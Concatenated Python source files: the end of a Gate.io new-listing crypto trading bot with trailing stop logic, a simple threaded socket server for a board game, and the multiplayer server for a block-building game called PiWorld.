if order_status == "cancelled" and float(order[announcement_coin]['_amount']) > float(order[announcement_coin]['_left']) and float(order[announcement_coin]['_left']) > 0:
# partial order. Change qty and fee_total in order and finish any remaining balance
partial_amount = float(order[announcement_coin]['_amount']) - float(order[announcement_coin]['_left'])
partial_fee = float(order[announcement_coin]['_fee'])
order[announcement_coin]['_amount_filled'] = f'{partial_amount}'
session[announcement_coin]['total_volume'] += (partial_amount * float(order[announcement_coin]['_price']))
session[announcement_coin]['total_amount'] += partial_amount
session[announcement_coin]['total_fees'] += partial_fee
session[announcement_coin]['orders'].append(copy.deepcopy(order[announcement_coin]))
logger.info(f"Partial fill order detected. {order_status=} | {partial_amount=} out of {amount=} | {partial_fee=} | {price=}")
# FUTURE: We'll probably want to start attempting to sell in the future immediately after ordering any amount
# It would require at least a minor refactor, since order is getting cleared and
# it seems that this function depends on order being empty, but sell() depends on order not being empty.
# globals.sell_ready.set()
# order not filled, try again.
logger.info(f"Clearing order with a status of {order_status}. Waiting for 'closed' status")
order.pop(announcement_coin) # reset for next iteration
else:
logger.warning(
f'{announcement_coin=} is not supported on gate io')
logger.info(f"Adding {announcement_coin} to old_coins.json")
globals.old_coins.append(announcement_coin)
store_old_coins(globals.old_coins)
else:
logger.error('supported_currencies is not initialized')
# else:
# logger.info( 'No coins announced, or coin has already been bought/sold. Checking more frequently in case TP and SL need updating')
time.sleep(3)
def sell():
while not globals.stop_threads:
logger.debug('Waiting for sell_ready event')
globals.sell_ready.wait()
logger.debug('sell_ready event triggered')
if globals.stop_threads:
break
# check if the order file exists and load the current orders
# basically the sell block and update TP and SL logic
if len(order) > 0:
for coin in list(order):
if float(order[coin]['_tp']) == 0:
st = order[coin]['_status']
logger.info(f"Order is initialized but not ready. Continuing. | Status={st}")
continue
# store some necessary trade info for a sell
coin_tp = order[coin]['_tp']
coin_sl = order[coin]['_sl']
volume = order[coin]['_amount']
stored_price = float(order[coin]['_price'])
symbol = order[coin]['_fee_currency']
# avoid div by zero error
if float(stored_price) == 0:
continue
logger.debug(f'Data for sell: {coin=} | {stored_price=} | {coin_tp=} | {coin_sl=} | {volume=} | {symbol=} ')
logger.info(f'get_last_price existing coin: {coin}')
obj = get_last_price(symbol, globals.pairing, False)
last_price = obj.price
logger.info("Finished get_last_price")
top_position_price = stored_price + (stored_price*coin_tp /100)
stop_loss_price = stored_price + (stored_price*coin_sl /100)
# need positive price or continue and wait
if float(last_price) == 0:
continue
logger.info(f'{symbol=}-{last_price=}\t[STOP: ${"{:,.5f}".format(stop_loss_price)} or {"{:,.2f}".format(coin_sl)}%]\t[TOP: ${"{:,.5f}".format(top_position_price)} or {"{:,.2f}".format(coin_tp)}%]\t[BUY: ${"{:,.5f}".format(stored_price)} (+/-): {"{:,.2f}".format(((float(last_price) - stored_price) / stored_price) * 100)}%]')
# update stop loss and take profit values if threshold is reached
if float(last_price) > stored_price + (
stored_price * coin_tp / 100) and globals.enable_tsl:
# increase as absolute value for TP
new_tp = float(last_price) + (float(last_price) * globals.ttp / 100)
# convert back into % difference from when the coin was bought
new_tp = float((new_tp - stored_price) / stored_price * 100)
# same deal as above, only applied to trailing SL
new_sl = float(last_price) + (float(last_price)*globals.tsl / 100)
new_sl = float((new_sl - stored_price) / stored_price * 100)
# new values to be added to the json file
order[coin]['_tp'] = new_tp
order[coin]['_sl'] = new_sl
store_order('order.json', order)
new_top_position_price = stored_price + (stored_price*new_tp /100)
new_stop_loss_price = stored_price + (stored_price*new_sl /100)
logger.info(f'updated tp: {round(new_tp, 3)}% / ${"{:,.3f}".format(new_top_position_price)}')
logger.info(f'updated sl: {round(new_sl, 3)}% / ${"{:,.3f}".format(new_stop_loss_price)}')
# close trade if tsl is reached or trail option is not enabled
elif float(last_price) < stored_price + (
stored_price * coin_sl / 100) or float(last_price) > stored_price + (
stored_price * coin_tp / 100) and not globals.enable_tsl:
try:
fees = float(order[coin]['_fee'])
sell_volume_adjusted = float(volume) - fees
logger.info(
f'starting sell place_order with :{symbol} | {globals.pairing} | {volume} | {sell_volume_adjusted} | {fees} | {float(sell_volume_adjusted)*float(last_price)} | side=sell | last={last_price}')
# sell for real if test mode is set to false
if not globals.test_mode:
sell = place_order(symbol, globals.pairing, float(sell_volume_adjusted)*float(last_price), 'sell', last_price)
logger.info("Finish sell place_order")
#check for completed sell order
if sell._status != 'closed':
# change order to sell remaining
if float(sell._left) > 0 and float(sell._amount) > float(sell._left):
# adjust down order _amount and _fee
order[coin]['_amount'] = sell._left
order[coin]['_fee'] = f'{fees - (float(sell._fee) / float(sell._price))}'
# add sell order sold.json (handled better in session.json now)
id = f"{coin}_{id}"
sold_coins[id] = sell
sold_coins[id] = sell.__dict__
sold_coins[id].pop("local_vars_configuration")
logger.info(f"Sell order did not close! {sell._left} of {coin} remaining. Adjusted order _amount and _fee to perform sell of remaining balance")
# add to session orders
try:
if len(session) > 0:
dp = copy.deepcopy(sold_coins[id])
session[coin]['orders'].append(dp)
except Exception as e:
logger.error(e)
pass
# keep going. Not finished until status is 'closed'
continue
logger.info(
f'sold {coin} with {round((float(last_price) - stored_price) * float(volume), 3)} profit | {round((float(last_price) - stored_price) / float(stored_price)*100, 3)}% PNL')
# remove order from json file
order.pop(coin)
store_order('order.json', order)
logger.debug('Order saved in order.json')
globals.sell_ready.clear()
except Exception as e:
logger.error(e)
# store sold trades data
else:
if not globals.test_mode:
sold_coins[coin] = sell
sold_coins[coin] = sell.__dict__
sold_coins[coin].pop("local_vars_configuration")
sold_coins[coin]['profit'] = f'{float(last_price) - stored_price}'
sold_coins[coin]['relative_profit_%'] = f'{(float(last_price) - stored_price) / stored_price * 100}%'
else:
sold_coins[coin] = {
'symbol': coin,
'price': last_price,
'volume': volume,
'time': datetime.timestamp(datetime.now()),
'profit': f'{float(last_price) - stored_price}',
'relative_profit_%': f'{(float(last_price) - stored_price) / stored_price * 100}%',
'id': 'test-order',
'text': 'test-order',
'create_time': datetime.timestamp(datetime.now()),
'update_time': datetime.timestamp(datetime.now()),
'currency_pair': f'{symbol}_{globals.pairing}',
'status': 'closed',
'type': 'limit',
'account': 'spot',
'side': 'sell',
'iceberg': '0',
}
logger.info(f'Sold coins:\r\n {sold_coins[coin]}')
# add to session orders
try:
if len(session) > 0:
dp = copy.deepcopy(sold_coins[coin])
session[coin]['orders'].append(dp)
store_order('session.json', session)
logger.debug('Session saved in session.json')
except Exception as e:
logger.error(e)
pass
store_order('sold.json', sold_coins)
logger.info('Order saved in sold.json')
else:
logger.debug("Size of order is 0")
time.sleep(3)
def main():
"""
Sells, adjusts TP and SL according to trailing values
and buys new coins
"""
# Protection from stale announcement
latest_coin = get_last_coin()
if latest_coin:
globals.latest_listing = latest_coin
# store config deets
globals.quantity = config['TRADE_OPTIONS']['QUANTITY']
globals.tp = config['TRADE_OPTIONS']['TP']
globals.sl = config['TRADE_OPTIONS']['SL']
globals.enable_tsl = config['TRADE_OPTIONS']['ENABLE_TSL']
globals.tsl = config['TRADE_OPTIONS']['TSL']
globals.ttp = config['TRADE_OPTIONS']['TTP']
globals.pairing = config['TRADE_OPTIONS']['PAIRING']
globals.test_mode = config['TRADE_OPTIONS']['TEST']
globals.stop_threads = False
globals.buy_ready.clear()
if not globals.test_mode:
logger.info(f'!!! LIVE MODE !!!')
t_get_currencies_thread = threading.Thread(target=get_all_currencies)
t_get_currencies_thread.start()
t_buy_thread = threading.Thread(target=buy)
t_buy_thread.start()
t_sell_thread = threading.Thread(target=sell)
t_sell_thread.start()
try:
search_and_update()
except KeyboardInterrupt:
logger.info('Stopping Threads')
globals.stop_threads = True
globals.buy_ready.set()
globals.sell_ready.set()
t_get_currencies_thread.join()
t_buy_thread.join()
t_sell_thread.join()
if __name__ == '__main__':
logger.info('started working...')
main()
logger.info('stopped working...')
|
chess_server.py | import sys
import socket
import atexit
import threading
HOST = "127.0.0.1"
PORT = 23333
MAX_CONNECTIONS = 8
MAX_BUFFER_SIZE = 2048
ENCODING = "utf-8"
if len(sys.argv) > 2:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
# str:connection
user = {}
# reg {name}
# send {name} {message}
# place {name} {x} {y}
# status -> {B/W/E/N}
# get -> char[][] {B/w/N}
# clear
# exit
atexit.register(quit)
def quit():
global s
s.close()
def send(conn, message):
conn.sendall(message.encode(ENCODING))
chessboard = []
def clear(chessboard):
chessboard.clear()
for i in range(0, 19):
chessboard.append([])
for j in range(0, 19):
chessboard[-1].append("N")
def to_string(chessboard):
data = ""
for line in chessboard:
data += "".join(data)
return data
def place(chessboard, name, x, y):
chessboard[x][y] = name
def serve(conn, addr):
global user
global chessboard
name = "Unknown Guest"
status = "N"
while True:
buf = conn.recv(MAX_BUFFER_SIZE)
command = buf.decode(ENCODING).strip()
print("(info) Message from %s:%s: %s" % (addr[0], addr[1], command.strip()))
parameters = command.split(" ")
token = parameters[0].lower()
if token == "reg":
user[parameters[1]] = conn
name = parameters[1]
print("(info) Register new user: %s" % name)
elif token == "send":
send(user[parameters[1]], " ".join(parameters[2:]))
elif token == "place":
place(
chessboard,
parameters[1],
int(parameters[2]), int(parameters[3])
)
elif token == "status":
send(status)
elif token == "get":
send(to_string(chessboard))
elif token == "clear":
clear(chessboard)
elif token == "exit":
conn.close()
user.pop(name)
print("(warn) %s left the server" % name)
return None
s.listen(MAX_CONNECTIONS)
while True:
conn, addr = s.accept()
print("(info) New connection from %s:%s" % addr)
t = threading.Thread(target=serve, args=(conn, addr))
t.start()
|
server.py | #!/usr/bin/env python
from math import floor
from world import World, show_clouds, show_plants, show_trees
import atexit
import datetime
import random
import re
#import requests
import sqlite3
import sys
import threading
import time
import traceback
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
import SocketServer as socketserver
else:
import queue
import socketserver
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
DB_PATH = 'my.piworld'
LOG_PATH = 'log.txt'
CHUNK_SIZE = 16
BUFFER_SIZE = 4096
COMMIT_INTERVAL = 5
MAX_LOCAL_PLAYERS = 4
MAX_SIGN_LENGTH = 256
AUTH_REQUIRED = False
DAY_LENGTH = 600
SPAWN_POINT = (0, 0, 0, 0, 0)
RATE_LIMIT = False
RECORD_HISTORY = False
INDESTRUCTIBLE_ITEMS = set([16])
ALLOWED_ITEMS = set([
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
17, 18, 19, 20, 21, 22, 23,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
ADD = 'F'
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
EVENT = 'v'
EXTRA = 'e'
GOTO = 'G'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
OPTION = 'O'
POSITION = 'P'
PQ = 'Q'
REDRAW = 'R'
REMOVE = 'X'
SHAPE = 's'
SIGN = 'S'
SPAWN = 'W'
TALK = 'T'
TIME = 'E'
TRANSFORM = 't'
VERSION = 'V'
YOU = 'U'
worldgen = ""
try:
from config import *
except ImportError:
pass
def log(*args):
now = datetime.datetime.utcnow()
line = ' '.join(map(str, (now,) + args))
print(line)
with open(LOG_PATH, 'a') as fp:
fp.write('%s\n' % line)
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
def packet(*args):
return '%s\n' % ','.join(map(str, args))
class RateLimiter(object):
def __init__(self, rate, per):
self.rate = float(rate)
self.per = float(per)
self.allowance = self.rate
self.last_check = time.time()
def tick(self):
if not RATE_LIMIT:
return False
now = time.time()
elapsed = now - self.last_check
self.last_check = now
self.allowance += elapsed * (self.rate / self.per)
if self.allowance > self.rate:
self.allowance = self.rate
if self.allowance < 1:
return True # too fast
else:
self.allowance -= 1
return False # okay
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Player:
def __init__(self, nick, position, pid):
self.pid = pid
self.nick = nick
self.position = position
self.is_active = False
class Handler(socketserver.BaseRequestHandler):
def setup(self):
self.position_limiter = RateLimiter(100, 5)
self.limiter = RateLimiter(1000, 10)
self.version = None
self.client_id = None
self.user_id = None
self.queue = queue.Queue()
self.running = True
self.players = []
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
if is_py2:
data = self.request.recv(BUFFER_SIZE)
else:
data = str(self.request.recv(BUFFER_SIZE), 'utf-8')
if not data:
break
buf.extend(data.replace('\r\n', '\n'))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
if not line:
continue
if line[0] == POSITION:
if self.position_limiter.tick():
log('RATE', self.client_id)
self.stop()
return
else:
if self.limiter.tick():
log('RATE', self.client_id)
self.stop()
return
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def stop(self):
self.request.close()
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except queue.Empty:
pass
except queue.Empty:
continue
data = ''.join(buf)
if is_py2:
self.request.sendall(data)
else:
self.request.sendall(bytes(data, 'utf-8'))
except Exception:
self.request.close()
raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
self.send_raw(packet(*args))
def active_players(self):
return [x for x in self.players if x.is_active]
class Model(object):
def __init__(self, seed):
self.world = World(seed)
self.clients = []
self.queue = queue.Queue()
self.commands = {
ADD: self.on_add,
AUTHENTICATE: self.on_authenticate,
CHUNK: self.on_chunk,
BLOCK: self.on_block,
EVENT: self.on_control_callback,
EXTRA: self.on_extra,
GOTO: self.on_goto,
LIGHT: self.on_light,
NICK: self.on_nick,
POSITION: self.on_position,
PQ: self.on_pq,
REMOVE: self.on_remove,
TALK: self.on_talk,
SHAPE: self.on_shape,
SIGN: self.on_sign,
SPAWN: self.on_spawn,
TRANSFORM: self.on_transform,
VERSION: self.on_version,
}
self.patterns = [
(re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
(re.compile(r'^/list$'), self.on_list),
]
self.running = True
def finish(self):
self.running = False
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
self.thread = thread
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
query = (
'select value from option where '
'name = :name;'
)
rows = list(self.execute(query, dict(name="show-clouds")))
if rows:
show_clouds.value = int(rows[0][0])
rows = list(self.execute(query, dict(name="show-plants")))
if rows:
show_plants.value = int(rows[0][0])
rows = list(self.execute(query, dict(name="show-trees")))
if rows:
show_trees.value = int(rows[0][0])
while self.running:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
# Commit any pending changes before exiting the thread. This will
# prevent sqlite leaving behind a journal file.
self.commit()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
'create table if not exists extra ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists extra_pqxyz_idx on '
' extra (p, q, x, y, z);',
'create table if not exists light ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists light_pqxyz_idx on '
' light (p, q, x, y, z);',
'create table if not exists shape ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists shape_pqxyz_idx on '
' shape (p, q, x, y, z);',
'create table if not exists transform ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists transform_pqxyz_idx on '
' transform (p, q, x, y, z);',
'create table if not exists sign ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' face int not null,'
' text text not null'
');',
'create index if not exists sign_pq_idx on sign (p, q);',
'create unique index if not exists sign_xyzface_idx on '
' sign (x, y, z, face);',
'create table if not exists block_history ('
' timestamp real not null,'
' user_id int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create table if not exists option ('
' name text not null,'
' value text not null'
');',
'create unique index if not exists option_idx on option (name);',
]
for query in queries:
self.execute(query)
def get_default_block(self, x, y, z):
p, q = chunked(x), chunked(z)
chunk = self.world.get_chunk(p, q)
return chunk.get((x, y, z), 0)
def get_block(self, x, y, z):
query = (
'select w from block where '
'p = :p and q = :q and x = :x and y = :y and z = :z;'
)
p, q = chunked(x), chunked(z)
rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
if rows:
return rows[0][0]
return self.get_default_block(x, y, z)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
log('CONN', client.client_id, *client.client_address)
client.players = []
self.clients.append(client)
client.send(TIME, time.time(), DAY_LENGTH)
client.send(TALK, 'Welcome to PiWorld!')
client.send(TALK, 'Type "/help" for a list of commands.')
for i in range(MAX_LOCAL_PLAYERS):
p = i + 1
player = Player('guest%d-%d' % (client.client_id, p), SPAWN_POINT, p)
client.players.append(player)
client.send(YOU, client.client_id, p, *client.players[i].position)
self.send_nick(client, p)
for i in range(MAX_LOCAL_PLAYERS):
self.send_positions(client, i + 1)
self.send_nicks(client)
self.send_options(client)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
self.send_talk('%s has disconnected from the server.' % client.players[0].nick)
def on_version(self, client, version):
if client.version is not None:
return
version = int(version)
if version != 2:
client.stop()
print("Unmatched client version:", version)
return
client.version = version
# TODO: client.start() here
def on_authenticate(self, client, username, access_token):
user_id = None
#if username and access_token:
# payload = {
# 'username': username,
# 'access_token': access_token,
# }
# response = requests.post(AUTH_URL, data=payload)
# if response.status_code == 200 and response.text.isdigit():
# user_id = int(response.text)
client.user_id = user_id
if user_id is None:
client.nick = 'guest%d' % client.client_id
else:
client.nick = username
self.send_nick(client, 1)
# TODO: has left message if was already authenticated
self.send_talk('%s has joined the game.' % client.players[0].nick)
def on_chunk(self, client, p, q, key=0):
packets = []
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
blocks = 0
for rowid, x, y, z, w in rows:
blocks += 1
packets.append(packet(BLOCK, p, q, x, y, z, w))
max_rowid = max(max_rowid, rowid)
query = (
'select rowid, x, y, z, w from extra where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
extras = 0
for rowid, x, y, z, w in rows:
extras += 1
packets.append(packet(EXTRA, p, q, x, y, z, w))
query = (
'select x, y, z, w from light where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
lights = 0
for x, y, z, w in rows:
lights += 1
packets.append(packet(LIGHT, p, q, x, y, z, w))
query = (
'select rowid, x, y, z, w from shape where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
shapes = 0
for rowid, x, y, z, w in rows:
shapes += 1
packets.append(packet(SHAPE, p, q, x, y, z, w))
query = (
'select rowid, x, y, z, w from transform where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
transforms = 0
for rowid, x, y, z, w in rows:
transforms += 1
packets.append(packet(TRANSFORM, p, q, x, y, z, w))
query = (
'select x, y, z, face, text from sign where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
signs = 0
for x, y, z, face, text in rows:
signs += 1
packets.append(packet(SIGN, p, q, x, y, z, face, text))
if blocks:
packets.append(packet(KEY, p, q, max_rowid))
if blocks or extras or lights or shapes or signs or transforms:
packets.append(packet(REDRAW, p, q))
packets.append(packet(CHUNK, p, q))
client.send_raw(''.join(packets))
def on_block(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
previous = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif w not in ALLOWED_ITEMS:
message = 'That item is not allowed.'
elif w and previous:
message = 'Cannot create blocks in a non-empty space.'
elif not w and not previous:
message = 'That space is already empty.'
elif previous in INDESTRUCTIBLE_ITEMS:
message = 'Cannot destroy that type of block.'
if message is not None:
client.send(BLOCK, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert into block_history (timestamp, user_id, x, y, z, w) '
'values (:timestamp, :user_id, :x, :y, :z, :w);'
)
if RECORD_HISTORY:
self.execute(query, dict(timestamp=time.time(),
user_id=client.user_id, x=x, y=y, z=z, w=w))
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
for dx in (-1, 0, 1):
for dz in (-1, 0, 1):
if dx == 0 and dz == 0:
continue
if dx and chunked(x + dx) == p:
continue
if dz and chunked(z + dz) == q:
continue
np, nq = p + dx, q + dz
self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
self.send_block(client, np, nq, x, y, z, -w)
if w == 0:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update extra set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update light set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update shape set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update transform set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
def on_extra(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Extras must be placed on a block.'
if message is not None:
# TODO: client.send(EXTRA, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into extra (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_extra(client, p, q, x, y, z, w)
def on_light(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif block == 0:
message = 'Lights must be placed on a block.'
elif w < 0 or w > 15:
message = 'Invalid light value.'
if message is not None:
# TODO: client.send(LIGHT, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into light (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_light(client, p, q, x, y, z, w)
def on_shape(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Shape must be placed on a block.'
if message is not None:
# TODO: client.send(SHAPE, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into shape (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_shape(client, p, q, x, y, z, w)
def on_transform(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Transform must be placed on a block.'
if message is not None:
# TODO: client.send(TRANSFORM, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into transform (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_transform(client, p, q, x, y, z, w)
def on_sign(self, client, x, y, z, face, *args):
if AUTH_REQUIRED and client.user_id is None:
client.send(TALK, 'Only logged in users are allowed to build.')
return
text = ','.join(args)
x, y, z, face = map(int, (x, y, z, face))
if y <= 0 or y > 255:
return
if face < 0 or face > 7:
return
if len(text) > MAX_SIGN_LENGTH:
text = text[:MAX_SIGN_LENGTH-1]
print("Truncating long sign text.")
p, q = chunked(x), chunked(z)
if text:
query = (
'insert or replace into sign (p, q, x, y, z, face, text) '
'values (:p, :q, :x, :y, :z, :face, :text);'
)
self.execute(query,
dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
else:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z and face = :face;'
)
self.execute(query, dict(x=x, y=y, z=z, face=face))
self.send_sign(client, p, q, x, y, z, face, text)
def on_position(self, client, player, x, y, z, rx, ry):
player = int(player)
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.players[player - 1].position = (x, y, z, rx, ry)
self.send_position(client, player)
def on_add(self, client, player):
player = int(player)
client.players[player - 1].is_active = True
self.send_add(client, player)
def on_remove(self, client, player):
player = int(player)
client.players[player - 1].is_active = False
self.send_remove(client, player)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
elif text.startswith('@'):
nick = text[1:].split(' ', 1)[0]
for other in self.clients:
if other.nick == nick:
client.send(TALK, '%s> %s' % (client.nick, text))
other.send(TALK, '%s> %s' % (client.nick, text))
break
else:
client.send(TALK, 'Unrecognized nick: "%s"' % nick)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, player, nick=None):
player = int(player)
if AUTH_REQUIRED:
client.send(TALK, 'You cannot change your nick on this server.')
return
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.players[player - 1].nick)
else:
self.send_talk('%s is now known as %s' % (client.players[player - 1].nick, nick))
client.players[player - 1].nick = nick
self.send_nick(client, player)
def on_spawn(self, client, player):
player = int(player)
client.players[player - 1].position = SPAWN_POINT
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_goto(self, client, player, nick=None):
player = int(player)
if nick in (None, ""):
clients = [x for x in self.clients if (x != client and len(client.active_players()) > 0)]
if len(client.active_players()) > 1:
# Include own client if > 1 active players
clients.append(client)
other = random.choice(clients) if clients else None
active_players = other.active_players()
other_player = random.choice(active_players) if active_players else None
else:
nicks = {}
for client in self.clients:
nicks.update(dict((player.nick, (client, player)) for player in client.players))
other = nicks.get(nick)[0]
other_player = nicks.get(nick)[1]
if other and other_player:
client.players[player - 1].position = other_player.position
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_pq(self, client, player, p, q):
player = int(player)
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.players[player - 1].position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_help(self, client, topic=None):
if topic is None:
client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
return
topic = topic.lower().strip()
if topic == 'goto':
client.send(TALK, 'Help: /goto [NAME]')
client.send(TALK, 'Teleport to another user.')
client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
elif topic == 'list':
client.send(TALK, 'Help: /list')
client.send(TALK, 'Display a list of connected users.')
elif topic == 'login':
client.send(TALK, 'Help: /login NAME')
client.send(TALK, 'Switch to another registered username.')
client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
elif topic == 'logout':
client.send(TALK, 'Help: /logout')
client.send(TALK, 'Unauthenticate and become a guest user.')
client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
elif topic == 'offline':
client.send(TALK, 'Help: /offline [FILE]')
client.send(TALK, 'Switch to offline mode.')
client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
